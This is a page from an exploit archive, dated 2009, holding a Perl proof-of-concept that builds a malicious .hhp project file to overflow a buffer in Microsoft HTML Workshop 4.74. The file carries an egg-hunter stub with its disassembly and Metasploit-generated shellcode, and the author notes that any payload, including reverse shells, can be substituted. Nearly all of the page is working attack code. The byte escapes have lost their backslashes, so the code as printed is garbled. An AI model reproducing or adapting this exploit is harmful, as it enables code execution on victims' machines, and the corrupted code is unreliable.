[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit
# Published : 2009-01-12
# Author : SkD
# Previous Title : VUPlayer 2.49 .ASX File (Universal) Local Buffer Overflow Exploit
# Next Title : VUPlayer 2.49 .ASX File (HREF) Universal Buffer Overflow Exploit
#!/usr/bin/perl
# Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit
# -----------------------------------------------------------------
# Discovered/Exploit by SkD (skdrat@hotmail.com)
# -----------------------------------------------------------------
#
# This is a continuation of my new method, shellhunting.
# The exploit is far more advanced than the Amaya's as it runs on
# every system, partly because the shellhunter itself is very much
# reliable and universal.
# The shellhunter does the following tasks to find and exec.
# shellcode:-
#
# 1- Searches through the whole memory of the application.
# 2- Installs a SEH handler so on access violations it won't
# stop hunting for the shellcode.
# 3- Repairs stack so a stack overflow won't occur (that is what
# happens when the SEH is called up, many PUSH instructions
# are called from the relevant modules (ntdll, etc).
# 4- Improved speed by searching through 32 bytes at a time.
# 5- Uses a certain address in memory to store a variable for the
# search.
#
# It is very stable and will allow any shellcode (bind/reverse shell,
# dl/exec). It will work on ALL Windows NT versions (2k, XP, Vista).
#
# Yeah, I guess that's about it. Took me a few hours to figure out the
# whole thing but nothing is impossible ;).
#
# Oh, I think some schools use this software :) (it's Microsoft's, right?).
#
# You can download the app. from Microsoft's official page:
# -> http://msdn.microsoft.com/en-us/library/ms669985.aspx
#
# If you are interested in my method and want to learn something new or
# improve your exploitation skills then visit my team's blog at:
# -> http://abysssec.com
#
# Peace out,
# SkD.
my $hhp_data1 = "x5Bx4Fx50x54x49x4Fx4Ex53".
"x5Dx0Dx0Ax43x6Fx6Ex74x65".
"x6Ex74x73x20x66x69x6Cx65".
"x3Dx41x0Dx0Ax49x6Ex64x65".
"x78x20x66x69x6Cx65x3D";
my $hhp_data2 = "x5Bx46x49x4Cx45x53x5Dx0D".
"x0Ax61x2Ex68x74x6D";
my $crlf = "x0dx0a";
# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".
"x49x49x49x49x49x49x49x48x49x49x49x49x51x5ax6ax46".
"x58x30x42x30x50x42x6bx42x41x56x42x32x42x41x41x32".
"x41x41x30x41x41x58x38x42x42x50x75x58x69x69x6cx4b".
"x58x62x64x65x50x67x70x47x70x6cx4bx42x65x45x6cx6e".
"x6bx73x4cx53x35x73x48x45x51x4ax4fx6cx4bx70x4fx52".
"x38x4cx4bx33x6fx55x70x57x71x6ax4bx61x59x4cx4bx36".
"x54x6ex6bx53x31x48x6ex55x61x39x50x4dx49x4cx6cx4d".
"x54x6bx70x74x34x66x67x4bx71x78x4ax56x6dx67x71x39".
"x52x48x6bx4cx34x35x6bx62x74x56x44x57x74x54x35x6b".
"x55x4ex6bx31x4fx65x74x67x71x5ax4bx50x66x6cx4bx56".
"x6cx42x6bx6ex6bx53x6fx47x6cx67x71x7ax4bx6cx4bx45".
"x4cx6cx4bx47x71x48x6bx4fx79x33x6cx44x64x73x34x49".
"x53x70x31x6bx70x71x74x4ex6bx73x70x56x50x4bx35x49".
"x50x62x58x66x6cx4cx4bx43x70x56x6cx4cx4bx50x70x45".
"x4cx4cx6dx6cx4bx35x38x77x78x78x6bx67x79x4ex6bx6b".
"x30x6cx70x57x70x63x30x33x30x4cx4bx32x48x67x4cx73".
"x6fx35x61x48x76x71x70x56x36x6cx49x4ax58x6ex63x69".
"x50x41x6bx56x30x65x38x6cx30x6fx7ax75x54x73x6fx31".
"x78x4ex78x79x6ex6fx7ax36x6ex66x37x6bx4fx5ax47x52".
"x43x65x31x30x6cx70x63x45x50x46";
#/----------------Advanced Shellhunter Code----------------
#01D717DD EB 1E JMP SHORT 01D717FD |
#01D717DF 83C4 64 ADD ESP,64 |
#01D717E2 83C4 64 ADD ESP,64 |
#01D717E5 83C4 64 ADD ESP,64 |
#01D717E8 83C4 64 ADD ESP,64 |
#01D717EB 83C4 64 ADD ESP,64 |
#01D717EE 83C4 64 ADD ESP,64 |
#01D717F1 83C4 64 ADD ESP,64 |
#01D717F4 83C4 64 ADD ESP,64 |
#01D717F7 83C4 64 ADD ESP,64 |
#01D717FA 83C4 54 ADD ESP,54 |
#01D717FD 33FF XOR EDI,EDI |
#01D717FF BA D0FAFD7F MOV EDX,7FFDFAD0 |
#01D71804 8B3A MOV EDI,DWORD PTR DS:[EDX] |
#01D71806 EB 0E JMP SHORT 01D71816 |
#01D71808 58 POP EAX |
#01D71809 83E8 3C SUB EAX,3C |
#01D7180C 50 PUSH EAX |
#01D7180D 6A FF PUSH -1 |
#01D7180F 33DB XOR EBX,EBX |
#01D71811 64:8923 MOV DWORD PTR FS:[EBX],ESP |
#01D71814 EB 05 JMP SHORT 01D7181B |
#01D71816 E8 EDFFFFFF CALL 01D71808 |
#01D7181B B8 12121212 MOV EAX,12121212 |
#01D71820 6BC0 02 IMUL EAX,EAX,2 |
#01D71823 BA D0FAFD7F MOV EDX,7FFDFAD0 |
#01D71828 83C7 20 ADD EDI,20 |
#01D7182B 893A MOV DWORD PTR DS:[EDX],EDI |
#01D7182D 3907 CMP DWORD PTR DS:[EDI],EAX |
#01D7182F ^75 F7 JNZ SHORT 01D71828 |
#01D71831 83C7 04 ADD EDI,4 |
#01D71834 6BC0 02 IMUL EAX,EAX,2 |
#01D71837 3907 CMP DWORD PTR DS:[EDI],EAX |
#01D71839 ^75 E0 JNZ SHORT 01D7181B |
#01D7183B 83C7 04 ADD EDI,4 |
#01D7183E B8 42424242 MOV EAX,42424242 |
#01D71843 3907 CMP DWORD PTR DS:[EDI],EAX |
#01D71845 ^75 D4 JNZ SHORT 01D7181B |
#01D71847 83C7 04 ADD EDI,4 |
#01D7184A FFE7 JMP EDI |
#-----------------------End of Code----------------------/
my $shellhunter = "xebx1e".
"x83xc4x64".
"x83xc4x64".
"x83xc4x64".
"x83xc4x64".
"x83xc4x64".
"x83xc4x64".
"x83xc4x64".
"x83xc4x64".
"x83xc4x64".
"x83xc4x54".
"x33xff".
"xbaxd0xfaxfdx7f".
"x8bx3a".
"xebx0e".
"x58".
"x83xe8x3c".
"x50".
"x6axff".
"x33xdb".
"x64x89x23".
"xebx05".
"xe8xedxffxffxff".
"xb8x12x12x12x12".
"x6bxc0x02".
"xbaxd0xfaxfdx7f".
"x83xc7x20".
"x89x3a".
"x39x07".
"x75xf7".
"x83xc7x04".
"x6bxc0x02".
"x39x07".
"x75xe0".
"x83xc7x04".
"xb8x42x42x42x42".
"x39x07".
"x75xd4".
"x83xc7x04".
"xffxe7";
my $lookout1 = "x24x24x24x24x48x48x48x48x42x42x42x42" x 64;
my $lookout2 = "x24x24x24x24x48x48x48x48x42x42x42x42x42" x 64;
my $lookout3 = "x24x24x24x24x48x48x48x48x42x42x42x42x42x42" x 64;
my $lookout4 = "x24x24x24x24x48x48x48x48x42x42x42x42x42x42x42" x 64;
my $len = 280 - (length($shellhunter) + 55);
my $overflow1 = "x41" x $len;
my $overflow2 = "x41" x 55;
my $overflow3 = "x42" x 256;
my $ret = "x93x1fx40x00"; #0x00401f93 CALL EDI [hhw.exe]
open(my $hhpprj_file, "> s.hhp");
print $hhpprj_file $hhp_data1.
$overflow1.$shellhunter.$overflow2.$ret.
$crlf.$crlf.
$hhp_data2.
$overflow3.$lookout1.$lookout2.$lookout3.$lookout4.$shellcode.$overflow3.
$crlf;
close $hhpprj_file;
# www.Syue.com [2009-01-12]